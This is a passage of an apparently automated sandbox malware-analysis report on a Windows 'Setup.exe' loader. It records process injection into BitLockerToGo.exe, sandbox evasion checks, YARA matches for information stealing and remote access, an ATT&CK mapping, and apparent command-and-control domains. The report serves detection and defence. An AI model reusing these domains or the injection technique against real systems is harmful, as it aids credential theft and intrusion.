                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00440680
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004256A6
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004116B1
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004096BA
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0041E760
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004077C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040D7A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00420870
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043B800
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00413896
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00414959
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00446920
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0044392C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00423930
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043A9AD
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042BA60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00406A00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00444A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042DAC2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00413AD0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042FB40
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00444B60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00416B1F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040BB20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042EB30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00429B31
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00421BC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040AB80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00410B80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00414B82
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040DC20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0041CC89
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00444D00
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00404D10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00418D10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00444DE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040EDF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00406DA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042DDA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00427E5D
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042CE10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043FEC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00444EB0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00434F40
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040DF6A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00443FE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00409F80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00423FA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0040DE40 appears 187 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0040C660 appears 57 times
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648
                    Source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup.exe
                    Source: Setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                    Source: classification engine Classification label: mal100.troj.evad.winEXE@4/0@11/9
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043C0AC CoCreateInstance
                    Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ab153e92-85ab-4968-9838-9558fcb1e72f
                    Source: Setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Setup.exe Virustotal: Detection: 19%
                    Source: Setup.exe String found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine <no value>value for arg %d: %w(BADINDEX)%!(NOVERB)complex128t.Kind == 12207031256103515625ParseFloatINT2VECTOR_OIDVECTOR_TINTERVAL_TIMESTAMP_REFCURSORANYELEMENT_GTSVECTOR_REGCONFIG_INT4RANGE_TSTZRANGE_DATERANGE_INT8RANGEmyhostname.localhostunixpacketwsarecvmsgwsasendmsgIP address netGo = ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtra,c=biws,r=res binderres masterresumptionexp masterSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1execerrdotSYSTEMROOTBackupReadConnectionKeep-Alivelocal-addrimage/webpimage/jpegRST_STREAMEND_STREAMSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookiekeep-aliveconnectionequivalentHost: %s
                    Source: Setup.exe String found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=RegSetValueExWlen of type %s.WithoutCancel.WithDeadline(Read Committedunsafe.Pointer on zero Valuereflect.Value.unknown methodinvalid syntax1907348632812595367431640625PG_DDL_COMMAND_TXID_SNAPSHOT_REGDICTIONARYunexpected EOFinternal error.in-addr.arpa.unknown mode: \.+*?()|[]{}^$bad record MACboringcrypto:
                    Source: Setup.exe String found in binary or memory: gogoproto.unsafe_unmarshaler_allgogoproto.goproto_extensions_mapvarint,64028,opt,name=protosizervarint,65012,opt,name=wktpointersha3: write to sponge after readgoogle.protobuf.EnumValueOptions&descriptor.FileDescriptorProto{&descriptor.EnumDescriptorProto{&descriptor.UninterpretedOption{SigEd25519 no Ed25519 collisionsblake2b: write to XOF after readblake2s: write to XOF after readinvalid_indicator_parameter_valueinvalid_row_count_in_limit_clausenull_value_no_indicator_parametersequence_generator_limit_exceededbranch_transaction_already_activefdw_invalid_data_type_descriptorsmissing character after backslashfailed to get Kerberos ticket: %qunexpected DataRow after error %s ISOLATION LEVEL READ UNCOMMITTEDunknown response for CopyFail: %qcouldn't parse pem in sslrootcertapplication/x-www-form-urlencoded/memory/classes/heap/unused:bytesmaximum of %d attributes exceededrelease of handle with refcount 0crypto/aes: output not full blockbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. 
%ssync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangeincompatible types for comparisoncannot index slice/array with nilsql: connection is already closedreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length 142108547152020037174224853515625710542735760100185871124267578125go package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesunsupported compression format %sError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledinvalid header field value for %qpad size
                    Source: Setup.exe String found in binary or memory: net/addrselect.go
                    Source: Setup.exe String found in binary or memory: google.golang.org/grpc@v1.65.0/internal/balancerload/load.go
                    Source: Setup.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                    Source: Setup.exe String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                    Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\Setup.exe
                    Source: unknown Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
                    Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648
                    Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: acgenral.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: samcli.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: msacm32.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: dwmapi.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: powrprof.dll
                    Source: C:\Users\user\Desktop\Setup.exe Section loaded: umpdc.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
                    Source: Setup.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Setup.exe Static file information: File size 19250176 > 1048576
                    Source: Setup.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x8af000
                    Source: Setup.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x890a00
                    Source: Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Setup.exe Static PE information: section name: .symtab
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0041A2AB push edx; iretd 1_2_0041A2AD
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043FE30 push eax; mov dword ptr [esp], E0E7E6E5h 1_2_0043FE3E
                    Source: C:\Users\user\Desktop\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_1-19453
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5016 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0Q_%SystemRoot%\system32\mswsock.dll
                    Source: Setup.exe, 00000000.00000002.1915546297.000000000061A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node graph_1-19454
                    Source: C:\Users\user\Desktop\Setup.exe Process information queried: ProcessInformation
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004425F0 LdrInitializeThunk
                    Source: C:\Users\user\Desktop\Setup.exe Process token adjusted: Debug

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Setup.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: drawwyobstacw.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: condifendteu.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: ehticsprocw.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: vennurviot.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: resinedyw.sbsy
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: enlargkiw.sbsy
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: allocatinow.sbs
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mathcucom.sbsy
                    Source: Setup.exe, 00000000.00000002.1918803772.0000000003892000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: proclaimykn.buzz
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2800008
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44A000
                    Source: C:\Users\user\Desktop\Setup.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45A000
                    Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    Source: C:\Users\user\Desktop\Setup.exe Queries volume information: C:\Users\user\Desktop\Setup.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Setup.exe Queries volume information: C:\Windows VolumeInformation
                    Source: C:\Users\user\Desktop\Setup.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
                    Source: C:\Users\user\Desktop\Setup.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 0.2.Setup.exe.3e18000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup.exe.3dc2000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup.exe.3dc2000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup.exe.3e18000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 0.2.Setup.exe.3e18000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup.exe.3dc2000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup.exe.3dc2000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup.exe.3e18000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix by tactic (the number in parentheses is the signature-count badge shown in the matrix cell; techniques without a number had no matching signature):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (2), Native API (1), PowerShell (1), Launchd
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: Process Injection (311), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (1), Process Injection (311), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery (1), Virtualization/Sandbox Evasion (1), Process Discovery (1), Account Discovery (1), System Information Discovery (22)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Screen Capture (1), Archive Collected Data (1), Clipboard Data (2), Input Capture, Keylogging
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
Source | Detection | Scanner
Setup.exe | 19% | Virustotal
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner
condifendteu.sbs | 0% | Virustotal
steamcommunity.com | 0% | Virustotal
vennurviot.sbs | 17% | Virustotal
drawwyobstacw.sbs | 0% | Virustotal
sergei-esenin.com | 18% | Virustotal
mathcucom.sbs | 20% | Virustotal
resinedyw.sbs | 0% | Virustotal
proclaimykn.buzz | 0% | Virustotal
enlargkiw.sbs | 0% | Virustotal
ehticsprocw.sbs | 0% | Virustotal
allocatinow.sbs | 0% | Virustotal
Source | Detection | Scanner | Label
https://player.vimeo.com | 0% | URL Reputation | safe
https://player.vimeo.com | 0% | URL Reputation | safe
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f | 0% | URL Reputation | safe
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
